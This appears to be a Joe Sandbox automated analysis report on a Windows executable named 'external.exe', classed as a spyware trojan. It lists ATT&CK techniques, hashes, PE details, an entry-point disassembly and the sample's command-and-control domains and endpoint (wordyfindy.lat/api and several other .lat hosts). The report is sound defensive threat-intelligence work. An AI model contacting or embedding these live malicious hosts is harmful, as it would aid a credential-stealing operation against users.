                Source: Yara matchFile source: Process Memory Space: external.exe PID: 7140, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: external.exe PID: 7140, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                11
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Screen Capture
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol1
                Archive Collected Data
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager141
                Security Software Discovery
                SMB/Windows Admin Shares41
                Data from Local System
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS11
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials11
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                external.exe37%VirustotalBrowse
                external.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                wordyfindy.lat
                104.21.19.35
                truetrue
                  unknown
                  bellflamre.click
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    wordyfindy.lattrue
                      unknown
                      slipperyloo.lattrue
                        unknown
                        curverpluch.lattrue
                          unknown
                          tentabatte.lattrue
                            unknown
                            manyrestro.lattrue
                              unknown
                              shapestickyr.lattrue
                                unknown
                                talkynicer.lattrue
                                  unknown
                                  https://wordyfindy.lat/apitrue
                                    unknown
                                    bashfulacid.lattrue
                                      unknown
                                      bellflamre.clicktrue
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabexternal.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://wordyfindy.lat/ffexternal.exe, 00000002.00000002.1996417805.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1949009593.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1948658180.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1948789926.0000000000E19000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://duckduckgo.com/ac/?q=external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgexternal.exe, 00000002.00000003.1882863786.0000000003496000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoexternal.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://wordyfindy.lat/api(WAexternal.exe, 00000002.00000002.1996332941.0000000000E02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://www.microsoft.coexternal.exe, 00000002.00000003.1906082479.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905933686.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906598081.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906164389.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906225551.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1907131073.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906343810.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905233843.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905589126.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906695904.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1904880647.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1907028346.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905783044.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906516458.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905681202.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906769458.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905285277.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905128011.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906942409.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905162450.0000000000E19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.external.exe, 00000002.00000003.1882863786.0000000003496000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://ocsp.rootca1.amazontrust.com0:external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016external.exe, 00000002.00000003.1725467175.0000000003533000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1859687812.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1725562484.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1725695856.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1860192237.00000000034E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17external.exe, 00000002.00000003.1725467175.0000000003533000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1859687812.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1725562484.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1725695856.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1860192237.00000000034E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.ecosia.org/newtab/external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brexternal.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://wordyfindy.lat:443/apiexternal.exe, 00000002.00000002.1996069207.0000000000D62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://wordyfindy.lat/external.exe, external.exe, 00000002.00000003.1935721640.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996417805.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1949098111.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1908135316.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1908263805.0000000000DF9000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996069207.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1986440657.0000000000DF9000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1932697450.0000000000DEF000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000002.1996281365.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1932578761.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1948722276.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1908103899.0000000000DE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://crl.miexternal.exe, 00000002.00000003.1906082479.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905933686.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906598081.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906164389.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906225551.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1907131073.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906343810.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905233843.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905589126.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906695904.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1904880647.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1907028346.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905783044.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906516458.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905681202.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906769458.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905285277.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905128011.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906942409.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905162450.0000000000E19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://ac.ecosia.org/autocomplete?q=external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiexternal.exe, 00000002.00000003.1882863786.0000000003496000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://x1.c.lencr.org/0external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://x1.i.lencr.org/0external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installexternal.exe, 00000002.00000003.1725562484.00000000034C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexternal.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://support.microsofexternal.exe, 00000002.00000003.1725467175.0000000003535000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesexternal.exe, 00000002.00000003.1725562484.00000000034C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://wordyfindy.lat:443/apiion.txtPKexternal.exe, 00000002.00000002.1996069207.0000000000D62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://support.mozilla.org/products/firefoxgro.allexternal.exe, 00000002.00000003.1882590251.00000000035B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs
                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      104.21.19.35
                                                                                                      wordyfindy.latUnited States
                                                                                                      13335CLOUDFLARENETUStrue
                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1579555
                                                                                                      Start date and time:2024-12-23 00:11:05 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 4m 58s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:6
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:external.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@4/1@2/1
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 98%
                                                                                                      • Number of executed functions: 47
                                                                                                      • Number of non-executed functions: 78
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Stop behavior analysis, all processes terminated
                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      TimeTypeDescription
                                                                                                      18:11:58API Interceptor9x Sleep call for process: external.exe modified
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      104.21.19.35http://qwasdrgqwdasd.winbestprizess.info/palasekddq2hf45ysm.jsGet hashmaliciousUnknownBrowse
                                                                                                        No context
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        CLOUDFLARENETUSLoader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                        • 172.64.41.3
                                                                                                        Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.66.86
                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.151.193
                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.191.144
                                                                                                        Full_Ver_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.63.229
                                                                                                        loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 162.158.254.178
                                                                                                        winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.18.182
                                                                                                        https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 104.21.234.144
                                                                                                        nshkppc.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 104.24.135.181
                                                                                                        swift-bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 104.18.38.10
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        a0e9f5d64349fb13191bc781f81f42e1Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.19.35
                                                                                                        Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.19.35
                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.19.35
                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.19.35
                                                                                                        Full_Ver_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.19.35
                                                                                                        winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.19.35
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                        • 104.21.19.35
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                        • 104.21.19.35
                                                                                                        No context
                                                                                                        Process:C:\Users\user\Desktop\external.exe
                                                                                                        File Type:very short file (no magic)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1
                                                                                                        Entropy (8bit):0.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:L:L
                                                                                                        MD5:7B8B965AD4BCA0E41AB51DE7B31363A1
                                                                                                        SHA1:D1854CAE891EC7B29161CCAF79A24B00C274BDAA
                                                                                                        SHA-256:1B16B1DF538BA12DC3F97EDBB85CAA7050D46C148134290FEBA80F8236C83DB9
                                                                                                        SHA-512:917148EC47923F2E0E3D73142AC4F94EC4C73078865BA6D29F0EA172CD6F4BF34DB699AF5C33535D3694D4AEF91A11F916004D0382F794448A8550623D34C985
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:n
                                                                                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):7.513055401926001
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:external.exe
                                                                                                        File size:564'224 bytes
                                                                                                        MD5:88cd76e4609e50c6435ebc4771427d2c
                                                                                                        SHA1:e86ece49d9d75aebf84e82ba5886014d2a6e302e
                                                                                                        SHA256:42011c4da8ac276fb88efb72aacf717bc57878f5e9a70b9994e4c224c46800bd
                                                                                                        SHA512:caf707d10213469be757665c13b3233250a609096e9b5492e136b93146bcb1c1e473c82d52c1c643f703838f7b00cbc80f90d6448c35a282d468656bf181fe77
                                                                                                        SSDEEP:12288:gRIomkRJWzi7X+UeyZAHoX+Rmo/RE1rKIwx6:ge/kRJWzib+UnAHoX+Rmo/RCrLw
                                                                                                        TLSH:71C4D1117550C073DD6721B364BADB6A462DFA200B626ACFA7480DBDDF352C1AB31B27
                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....hg.........."......(...........p............@.................................Z.....@.....................................<..
                                                                                                        Icon Hash:90cececece8e8eb0
                                                                                                        Entrypoint:0x4170bb
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows cui
                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x676819F1 [Sun Dec 22 13:53:53 2024 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:6
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:6
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:6
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:1f5f01fd52677b24724028ad24992aa9
                                                                                                        Instruction
                                                                                                        call 00007F6AF952DB6Ah
                                                                                                        jmp 00007F6AF952D9D9h
                                                                                                        mov ecx, dword ptr [00440700h]
                                                                                                        push esi
                                                                                                        push edi
                                                                                                        mov edi, BB40E64Eh
                                                                                                        mov esi, FFFF0000h
                                                                                                        cmp ecx, edi
                                                                                                        je 00007F6AF952DB66h
                                                                                                        test esi, ecx
                                                                                                        jne 00007F6AF952DB88h
                                                                                                        call 00007F6AF952DB91h
                                                                                                        mov ecx, eax
                                                                                                        cmp ecx, edi
                                                                                                        jne 00007F6AF952DB69h
                                                                                                        mov ecx, BB40E64Fh
                                                                                                        jmp 00007F6AF952DB70h
                                                                                                        test esi, ecx
                                                                                                        jne 00007F6AF952DB6Ch
                                                                                                        or eax, 00004711h
                                                                                                        shl eax, 10h
                                                                                                        or ecx, eax
                                                                                                        mov dword ptr [00440700h], ecx
                                                                                                        not ecx
                                                                                                        pop edi
                                                                                                        mov dword ptr [00440740h], ecx
                                                                                                        pop esi
                                                                                                        ret
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        sub esp, 14h
                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                        xorps xmm0, xmm0
                                                                                                        push eax
                                                                                                        movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                        call dword ptr [0043D914h]
                                                                                                        mov eax, dword ptr [ebp-08h]
                                                                                                        xor eax, dword ptr [ebp-0Ch]
                                                                                                        mov dword ptr [ebp-04h], eax
                                                                                                        call dword ptr [0043D8CCh]
                                                                                                        xor dword ptr [ebp-04h], eax
                                                                                                        call dword ptr [0043D8C8h]
                                                                                                        xor dword ptr [ebp-04h], eax
                                                                                                        lea eax, dword ptr [ebp-14h]
                                                                                                        push eax
                                                                                                        call dword ptr [0043D964h]
                                                                                                        mov eax, dword ptr [ebp-10h]
                                                                                                        lea ecx, dword ptr [ebp-04h]
                                                                                                        xor eax, dword ptr [ebp-14h]
                                                                                                        xor eax, dword ptr [ebp-04h]
                                                                                                        xor eax, ecx
                                                                                                        leave
                                                                                                        ret
                                                                                                        mov eax, 00004000h
                                                                                                        ret
                                                                                                        push 00441E50h
                                                                                                        call dword ptr [0043D93Ch]
                                                                                                        ret
                                                                                                        push 00030000h
                                                                                                        push 00010000h
                                                                                                        push 00000000h
                                                                                                        call 00007F6AF9535198h
                                                                                                        add esp, 0Ch
                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3d6b40x3c.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x8e0000x3e8.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x440000x2324.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x399680x18.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x35cf80xc0.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x3d8600x170.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000x326cc0x32800ccc71f71555262d04b28eeb13f33c694False0.5078125data6.449171689149143IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0x340000xad9c0xae00265ca2e098c45dacae5fa86d5b3aa7cbFalse0.4167789152298851locale data table4.866718139159974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0x3f0000x36180x260034a18fbac611bd450c331e8e8b0fc570False0.31270559210526316data5.125689677633356IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .tls0x430000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .reloc0x440000x23240x2400a5356144ed5fdf31d774488bfaa21264False0.7392578125data6.496424389763303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                        .bss0x470000x470000x470003012423acc5a2286fca531663b8ae4f8False1.0003301056338028OpenPGP Secret Key7.999411323179124IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .rsrc0x8e0000x3e80x40035e84f3f24c06d757c32542e07bb3560False0.43359375data3.2859175893892143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                        RT_VERSION0x8e0580x390dataEnglishUnited States0.4517543859649123
                                                                                                        DLLImport
